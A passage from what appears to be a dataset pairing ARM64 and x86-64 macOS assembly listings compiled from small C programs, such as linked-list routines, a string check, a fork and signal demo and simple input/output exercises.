## %bb.2: ## in Loop: Header=BB4_1 Depth=1
movq -16(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -16(%rbp)
jmp LBB4_1
LBB4_3:
movq -16(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _list_get_index ## -- Begin function list_get_index
.p2align 4, 0x90
_list_get_index: ## @list_get_index
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movl %esi, -20(%rbp)
movq -16(%rbp), %rax
movq %rax, -32(%rbp)
movl $0, -36(%rbp)
LBB5_1: ## =>This Inner Loop Header: Depth=1
cmpq $0, -32(%rbp)
je LBB5_5
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movl -36(%rbp), %eax
cmpl -20(%rbp), %eax
jne LBB5_4
## %bb.3:
jmp LBB5_5
LBB5_4: ## in Loop: Header=BB5_1 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -32(%rbp)
jmp LBB5_1
LBB5_5:
movl -36(%rbp), %eax
cmpl -20(%rbp), %eax
je LBB5_7
## %bb.6:
movq $0, -8(%rbp)
jmp LBB5_8
LBB5_7:
movq -32(%rbp), %rax
movq %rax, -8(%rbp)
LBB5_8:
movq -8(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _list_add ## -- Begin function list_add
.p2align 4, 0x90
_list_add: ## @list_add
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl $24, %edi
callq _malloc
movq %rax, -24(%rbp)
movq -8(%rbp), %rdi
callq _list_get_last
movq %rax, -32(%rbp)
movl -12(%rbp), %ecx
movq -24(%rbp), %rax
movl %ecx, (%rax)
movq -32(%rbp), %rcx
movq -24(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rax
movq $0, 16(%rax)
movq -24(%rbp), %rcx
movq -32(%rbp), %rax
movq %rcx, 16(%rax)
movq -8(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _list_remove_index ## -- Begin function list_remove_index
.p2align 4, 0x90
_list_remove_index: ## @list_remove_index
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -16(%rbp)
movl %esi, -20(%rbp)
movq -16(%rbp), %rdi
movl -20(%rbp), %esi
callq _list_get_index
movq %rax, -32(%rbp)
cmpq $0, -32(%rbp)
jne LBB7_2
## %bb.1:
movq -16(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB7_9
LBB7_2:
movq -32(%rbp), %rax
cmpq $0, 8(%rax)
je LBB7_6
## %bb.3:
movq -32(%rbp), %rax
movq 16(%rax), %rcx
movq -32(%rbp), %rax
movq 8(%rax), %rax
movq %rcx, 16(%rax)
movq -32(%rbp), %rax
cmpq $0, 16(%rax)
je LBB7_5
## %bb.4:
movq -32(%rbp), %rax
movq 8(%rax), %rcx
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rcx, 8(%rax)
LBB7_5:
movq -32(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
movq -32(%rbp), %rdi
callq _free
movq -40(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB7_9
LBB7_6:
movq -32(%rbp), %rax
cmpq $0, 16(%rax)
je LBB7_8
## %bb.7:
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq $0, 8(%rax)
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -48(%rbp)
movq -32(%rbp), %rdi
callq _free
movq -48(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB7_9
LBB7_8:
movq $0, -8(%rbp)
LBB7_9:
movq -8(%rbp), %rax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _list_remove_values ## -- Begin function list_remove_values
.p2align 4, 0x90
_list_remove_values: ## @list_remove_values
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movq -8(%rbp), %rax
movq %rax, -24(%rbp)
LBB8_1: ## =>This Inner Loop Header: Depth=1
cmpq $0, -24(%rbp)
je LBB8_11
## %bb.2: ## in Loop: Header=BB8_1 Depth=1
movq -24(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -32(%rbp)
movq -24(%rbp), %rax
movl (%rax), %eax
cmpl -12(%rbp), %eax
jne LBB8_10
## %bb.3: ## in Loop: Header=BB8_1 Depth=1
movq -24(%rbp), %rax
cmpq $0, 8(%rax)
je LBB8_5
## %bb.4: ## in Loop: Header=BB8_1 Depth=1
movq -24(%rbp), %rax
movq 16(%rax), %rcx
movq -24(%rbp), %rax
movq 8(%rax), %rax
movq %rcx, 16(%rax)
LBB8_5: ## in Loop: Header=BB8_1 Depth=1
movq -24(%rbp), %rax
cmpq $0, 16(%rax)
je LBB8_7
## %bb.6: ## in Loop: Header=BB8_1 Depth=1
movq -24(%rbp), %rax
movq 8(%rax), %rcx
movq -24(%rbp), %rax
movq 16(%rax), %rax
movq %rcx, 8(%rax)
LBB8_7: ## in Loop: Header=BB8_1 Depth=1
movq -24(%rbp), %rax
cmpq -8(%rbp), %rax
jne LBB8_9
## %bb.8: ## in Loop: Header=BB8_1 Depth=1
movq -24(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -8(%rbp)
LBB8_9: ## in Loop: Header=BB8_1 Depth=1
movq -24(%rbp), %rdi
callq _free
LBB8_10: ## in Loop: Header=BB8_1 Depth=1
movq -32(%rbp), %rax
movq %rax, -24(%rbp)
jmp LBB8_1
LBB8_11:
movq -8(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/89235.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ft_str_is_alpha ; -- Begin function ft_str_is_alpha
.p2align 2
_ft_str_is_alpha: ; @ft_str_is_alpha
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #16]
str wzr, [sp, #12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_8
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
subs w8, w8, #65
cset w8, le
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
subs w8, w8, #90
cset w8, lt
tbnz w8, #0, LBB0_7
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
subs w8, w8, #97
cset w8, le
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
subs w8, w8, #122
cset w8, lt
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
str wzr, [sp, #28]
b LBB0_9
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB0_1
LBB0_8:
mov w8, #1
str w8, [sp, #28]
b LBB0_9
LBB0_9:
ldr w0, [sp, #28]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ft_str_is_alpha ## -- Begin function ft_str_is_alpha
.p2align 4, 0x90
_ft_str_is_alpha: ## @ft_str_is_alpha
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movl $0, -20(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
je LBB0_8
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $65, %eax
jle LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $90, %eax
jl LBB0_7
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $97, %eax
jle LBB0_6
## %bb.5: ## in Loop: Header=BB0_1 Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $122, %eax
jl LBB0_7
LBB0_6:
movl $0, -4(%rbp)
jmp LBB0_9
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB0_1
LBB0_8:
movl $1, -4(%rbp)
LBB0_9:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/25138675.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _parent_trap ; -- Begin function parent_trap
.p2align 2
_parent_trap: ; @parent_trap
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
bl _fprintf
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _child_trap ; -- Begin function child_trap
.p2align 2
_child_trap: ; @child_trap
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fprintf
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
str w0, [sp, #8]
str x1, [sp]
bl _fork
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
mov w0, #1000
bl _sleep
mov w0, #0
bl _exit
LBB2_2:
mov w0, #2
adrp x1, _parent_trap@PAGE
add x1, x1, _parent_trap@PAGEOFF
bl _signal
mov w0, #1000
bl _sleep
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "They got back together!\n"
l_.str.1: ; @.str.1
.asciz "Caught signal in CHILD.\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _parent_trap ## -- Begin function parent_trap
.p2align 4, 0x90
_parent_trap: ## @parent_trap
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str(%rip), %rsi
movb $0, %al
callq _fprintf
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _child_trap ## -- Begin function child_trap
.p2align 4, 0x90
_child_trap: ## @child_trap
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.1(%rip), %rsi
movb $0, %al
callq _fprintf
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
callq _fork
cmpl $0, %eax
jne LBB2_2
## %bb.1:
movl $1000, %edi ## imm = 0x3E8
callq _sleep
xorl %edi, %edi
callq _exit
LBB2_2:
movl $2, %edi
leaq _parent_trap(%rip), %rsi
callq _signal
movl $1000, %edi ## imm = 0x3E8
callq _sleep
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "They got back together!\n"
L_.str.1: ## @.str.1
.asciz "Caught signal in CHILD.\n"
.subsections_via_symbols
| the_stack_data/28261715.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
ldr w8, [sp, #12]
and w8, w8, #0xfffffffe
str w8, [sp, #8]
ldr w8, [sp, #8]
orr w0, w8, #0x1
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ## -- Begin function foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl -4(%rbp), %eax
andl $-2, %eax
movl %eax, -8(%rbp)
movl -8(%rbp), %eax
orl $1, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/182953291.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #40]
str x1, [sp, #32]
ldr x8, [sp, #32]
str x8, [sp, #24]
str wzr, [sp, #20]
; kill: def $x8 killed $xzr
str xzr, [sp, #8]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _bar ; -- Begin function bar
.p2align 2
_bar: ; @bar
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #40]
str x1, [sp, #32]
ldr x8, [sp, #32]
str x8, [sp, #24]
str wzr, [sp, #20]
; kill: def $x8 killed $xzr
str xzr, [sp, #8]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.comm _c,4,2 ; @c
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ## -- Begin function foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rax
movq %rax, -24(%rbp)
movl $0, -28(%rbp)
movq $0, -40(%rbp)
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _bar ## -- Begin function bar
.p2align 4, 0x90
_bar: ## @bar
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rax
movq %rax, -24(%rbp)
movl $0, -28(%rbp)
movq $0, -40(%rbp)
popq %rbp
retq
.cfi_endproc
## -- End function
.comm _c,4,2 ## @c
.subsections_via_symbols
| the_stack_data/182200.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #24] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #8
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
str x0, [sp, #16] ; 8-byte Folded Spill
bl _scanf
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldr x0, [sp, #16] ; 8-byte Folded Reload
mov x9, sp
sub x8, x29, #12
str x8, [x9]
bl _scanf
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
add w8, w8, w9
mov w9, #2
sdiv w8, w8, w9
stur w8, [x29, #-16]
ldur w8, [x29, #-8]
ldur w10, [x29, #-12]
subs w8, w8, w10
sdiv w8, w8, w9
stur w8, [x29, #-20]
ldur w8, [x29, #-16]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-20]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
ldr w0, [sp, #24] ; 4-byte Folded Reload
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter x+y:"
l_.str.1: ; @.str.1
.asciz "%d"
l_.str.2: ; @.str.2
.asciz "Enter x-y:"
l_.str.3: ; @.str.3
.asciz "The value of x and y are %d and %d:"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -12(%rbp), %rsi
movb $0, %al
callq _scanf
movl -8(%rbp), %eax
addl -12(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, -16(%rbp)
movl -8(%rbp), %eax
subl -12(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, -20(%rbp)
movl -16(%rbp), %esi
movl -20(%rbp), %edx
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter x+y:"
L_.str.1: ## @.str.1
.asciz "%d"
L_.str.2: ## @.str.2
.asciz "Enter x-y:"
L_.str.3: ## @.str.3
.asciz "The value of x and y are %d and %d:"
.subsections_via_symbols
| the_stack_data/165766477.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #848
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #36]
str wzr, [sp, #32]
str wzr, [sp, #32]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #32]
subs w8, w8, #100
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
mov x9, sp
add x8, sp, #24
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldr d0, [sp, #24]
ldrsw x9, [sp, #32]
add x8, sp, #40
str d0, [x8, x9, lsl #3]
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB0_1
LBB0_4:
str wzr, [sp, #32]
b LBB0_5
LBB0_5: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #32]
subs w8, w8, #100
cset w8, ge
tbnz w8, #0, LBB0_10
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=1
ldrsw x9, [sp, #32]
add x8, sp, #40
ldr d0, [x8, x9, lsl #3]
fmov d1, #10.00000000
fcmp d0, d1
cset w8, hi
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=1
ldr w8, [sp, #32]
; implicit-def: $x9
mov x9, x8
ldrsw x10, [sp, #32]
add x8, sp, #40
ldr d0, [x8, x10, lsl #3]
mov x8, sp
str x9, [x8]
str d0, [x8, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_5 Depth=1
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_5 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB0_5
LBB0_10:
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_12
b LBB0_11
LBB0_11:
bl ___stack_chk_fail
LBB0_12:
mov w0, #0
add sp, sp, #848
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%lf"
l_.str.1: ; @.str.1
.asciz "A[%d] = %.1lf\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function main
LCPI0_0:
.quad 0x4024000000000000 ## double 10
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $832, %rsp ## imm = 0x340
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -820(%rbp)
movl $0, -824(%rbp)
movl $0, -824(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $100, -824(%rbp)
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str(%rip), %rdi
leaq -832(%rbp), %rsi
movb $0, %al
callq _scanf
movsd -832(%rbp), %xmm0 ## xmm0 = mem[0],zero
movslq -824(%rbp), %rax
movsd %xmm0, -816(%rbp,%rax,8)
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -824(%rbp), %eax
addl $1, %eax
movl %eax, -824(%rbp)
jmp LBB0_1
LBB0_4:
movl $0, -824(%rbp)
LBB0_5: ## =>This Inner Loop Header: Depth=1
cmpl $100, -824(%rbp)
jge LBB0_10
## %bb.6: ## in Loop: Header=BB0_5 Depth=1
movslq -824(%rbp), %rax
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd -816(%rbp,%rax,8), %xmm0
jb LBB0_8
## %bb.7: ## in Loop: Header=BB0_5 Depth=1
movl -824(%rbp), %esi
movslq -824(%rbp), %rax
movsd -816(%rbp,%rax,8), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.1(%rip), %rdi
movb $1, %al
callq _printf
LBB0_8: ## in Loop: Header=BB0_5 Depth=1
jmp LBB0_9
LBB0_9: ## in Loop: Header=BB0_5 Depth=1
movl -824(%rbp), %eax
addl $1, %eax
movl %eax, -824(%rbp)
jmp LBB0_5
LBB0_10:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_12
## %bb.11:
xorl %eax, %eax
addq $832, %rsp ## imm = 0x340
popq %rbp
retq
LBB0_12:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%lf"
L_.str.1: ## @.str.1
.asciz "A[%d] = %.1lf\n"
.subsections_via_symbols
| the_stack_data/125507.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/44075.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _tx ; -- Begin function tx
.p2align 2
_tx: ; @tx
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
strb w0, [sp, #15]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _putchar ; -- Begin function putchar
.p2align 2
_putchar: ; @putchar
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sturb w0, [x29, #-1]
ldursb w8, [x29, #-1]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
mov w0, #13
bl _tx
b LBB1_2
LBB1_2:
ldursb w0, [x29, #-1]
bl _tx
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _kbhit ; -- Begin function kbhit
.p2align 2
_kbhit: ; @kbhit
.cfi_startproc
; %bb.0:
mov w0, #0
ret
.cfi_endproc
; -- End function
.globl _getchar ; -- Begin function getchar
.p2align 2
_getchar: ; @getchar
.cfi_startproc
; %bb.0:
mov w0, #97
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _tx ## -- Begin function tx
.p2align 4, 0x90
_tx: ## @tx
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %dil, %al
movb %al, -1(%rbp)
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _putchar ## -- Begin function putchar
.p2align 4, 0x90
_putchar: ## @putchar
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movb %dil, %al
movb %al, -1(%rbp)
movsbl -1(%rbp), %eax
cmpl $10, %eax
jne LBB1_2
## %bb.1:
movl $13, %edi
callq _tx
LBB1_2:
movsbl -1(%rbp), %edi
callq _tx
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
